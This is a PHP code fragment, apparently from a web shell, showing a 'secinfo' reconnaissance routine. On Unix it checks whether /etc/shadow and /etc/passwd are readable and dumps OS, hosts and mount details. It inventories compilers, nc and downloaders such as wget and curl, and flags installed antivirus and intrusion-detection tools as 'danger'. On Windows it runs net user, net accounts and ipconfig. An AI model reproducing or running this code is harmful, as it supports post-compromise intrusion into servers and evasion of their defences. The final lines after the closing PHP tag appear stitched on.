elseif ($act == 'secinfo') {
if(!IS_WIN ) {
$userful=array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger= array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders= array('wget','fetch','lynx','links','curl','get','lwp-mirror');
secparam('Readable/etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
secparam('Readable/etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
secparam('OSversion', @file_get_contents('/proc/version'));
secparam('Distrname', @file_get_contents('/etc/issue.net'));
$safe_mode= @ini_get('safe_mode');
if(!$GLOBALS['safe_mode']){
$temp=array();
foreach($userful as $item)
if(which($item)){$temp[]=$item;}
secparam('Userful',implode(', ',$temp));
$temp=array();
foreach($danger as $item)
if(which($item)){$temp[]=$item;}
secparam('Danger',implode(', ',$temp));
$temp=array();
foreach($downloaders as $item)
if(which($item)){$temp[]=$item;}
secparam('Downloaders',implode(', ',$temp));
secparam('Hosts',@file_get_contents('/etc/hosts'));
secparam('HDDspace', execute('df -h'));
secparam('Mountoptions', @file_get_contents('/etc/fstab'));
}
}else {
secparam('OSVersion',execute('ver'));
secparam('AccountSettings',execute('net accounts'));
secparam('UserAccounts',execute('net user'));
secparam('IPConfigurate',execute('ipconfig -all'));
}
}//end
else {
m('未定义的行动');
}
?>
debuginfo();
ob_end_flush();
if(isset($DB)) {
echo'. '.$DB->querycount.' queries';
}
?>
.